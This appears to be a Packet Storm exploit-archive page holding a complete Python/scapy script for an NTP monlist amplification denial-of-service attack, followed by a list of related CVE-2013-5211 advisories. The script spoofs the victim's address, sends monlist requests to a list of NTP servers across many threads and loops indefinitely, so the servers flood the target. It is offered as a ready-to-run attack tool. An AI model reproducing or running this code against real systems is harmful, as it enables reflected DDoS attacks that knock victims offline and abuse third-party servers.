Lucene search
DaRkReDPACKETSTORM:127492HistoryJul 16, 2014 - 12:00 a.m.
NTP Amplification Denial Of Service Tool
2014-07-1600:00:00
DaRkReD
packetstormsecurity.com
655
0.966 High
EPSS
Percentile
99.5%
`#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
#packet sender
def deny():
#Import globals to function
global ntplist
global currentserver
global data
global target
ntpserver = ntplist[currentserver] #Get new server
currentserver = currentserver + 1 #Increment for next
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
send(packet,loop=1) #SEND IT
#So I dont have to have the same stuff twice
def printhelp():
print "NTP Amplification DOS Attack"
print "By DaRkReD"
print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
print "NTP serverlist file should contain one IP per line"
print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
exit(0)
if len(sys.argv) < 4:
printhelp()
#Fetch Args
target = sys.argv[1]
#Help out idiots
if target in ("help","-h","h","?","--h","--help","/?"):
printhelp()
ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
ntplist = f.readlines()
#Make sure we dont out of bounds
if numberthreads > int(len(ntplist)):
print "Attack Aborted: More threads than servers"
print "Next time dont create more threads than servers"
exit(1)
#Magic Packet aka NTP v2 Monlist Packet
data = "\x17\x00\x03\x2a" + "\x00" * 4
#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"
#Thread spawner
for n in range(numberthreads):
thread = threading.Thread(target=deny)
thread.daemon = True
thread.start()
threads.append(thread)
#In progress!
print "Sending..."
#Keep alive so ctrl+c still kills all them threads
while True:
time.sleep(1)
`
Related
nessus
nessus
AIX 6.1 TL 8 : ntp (IV58068)
2014-06-17 00:00:00
Oracle Linux 7 : ntp (ELSA-2016-3612)
2016-09-13 00:00:00
AIX 6.1 TL 7 : ntp (IV58413)
2014-06-17 00:00:00
threatpost
threatpost
Volume of NTP Amplification Attacks Getting Louder
2014-04-29 13:03:29
NTP Amplification Blamed for 400 Gbps DDoS Attack
2014-02-11 12:21:35
PointDNS Recovers from Massive DDoS Attack
2014-05-12 15:35:26
checkpoint_advisories
checkpoint_advisories
NTP Servers Monlist Command Denial of Service (CVE-2013-5211)
2014-01-19 00:00:00
suse
suse
DDoS reflection attacks in ntp
2014-01-20 17:05:38
zdt
zdt
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-29 00:00:00
securityvulns
securityvulns
ntp traffic amplification
2014-01-14 00:00:00
[security bulletin] HPSBUX02960 SSRT101419 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS)
2014-01-14 00:00:00
TA14-013A: NTP Amplification Attacks Using CVE-2013-5211
2014-01-14 00:00:00
ibm
ibm
cert
cert
NTP can be abused to amplify denial-of-service attack traffic
2014-01-10 00:00:00
freebsd
freebsd
ntpd DRDoS / Amplification Attack using ntpdc monlist command
2014-01-01 00:00:00
exploitpack
exploitpack
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-28 00:00:00
openvas
openvas
Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)
2020-03-24 00:00:00
Juniper Networks Junos OS NTP Server Amplification Denial of Service Vulnerability
2014-07-31 00:00:00
SUSE: Security Advisory (SUSE-SU-2014:0937-1)
2021-06-09 00:00:00
f5
f5
SOL15154 - NTP vulnerability CVE-2013-5211
2014-04-10 00:00:00
K15154 : NTP vulnerability CVE-2013-5211
2014-04-10 00:00:00
mageia
mageia
Updated ntp packages work around security vulnerability
2014-01-31 20:44:56
aix
aix
amazon
amazon
Medium: ntp
2021-09-08 23:35:00
Medium: ntp
2018-05-10 17:01:00
checkpoint_security
checkpoint_security
Blocking NTP access on Gaia OS / IPSO OS (CVE-2013-5211)
2014-03-01 22:00:00
fortinet
fortinet
FortiAnalyzer could potentially be used in NTP amplification attacks
2020-06-22 00:00:00
thn
thn
ubuntucve
ubuntucve
CVE-2013-5211
2014-01-02 00:00:00
metasploit
metasploit
NTP Monitor List Scanner
2010-01-27 23:25:17
ics
ics
NTP Reflection Attack
2018-09-06 12:00:00
gentoo
gentoo
NTP: Traffic amplification
2014-01-16 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-14:02.ntpd
2014-01-14 00:00:00
slackware
slackware
ntp
2014-02-13 16:38:35
prion
prion
Security feature bypass
2014-01-02 14:59:00
oraclelinux
oraclelinux
ntp security update
2016-09-09 00:00:00
ntp security update
2016-09-09 00:00:00
ntp security update
2018-12-19 00:00:00
cve
cve
CVE-2013-5211
2014-01-02 14:59:00
debiancve
debiancve
CVE-2013-5211
2014-01-02 14:59:00
exploitdb
exploitdb
NTP ntpd monlist Query Reflection - Denial of Service
2014-04-28 00:00:00
vmware
vmware
VMware vSphere updates to third party libraries
2014-03-11 00:00:00
VMware vSphere updates to third party libraries
2014-03-11 00:00:00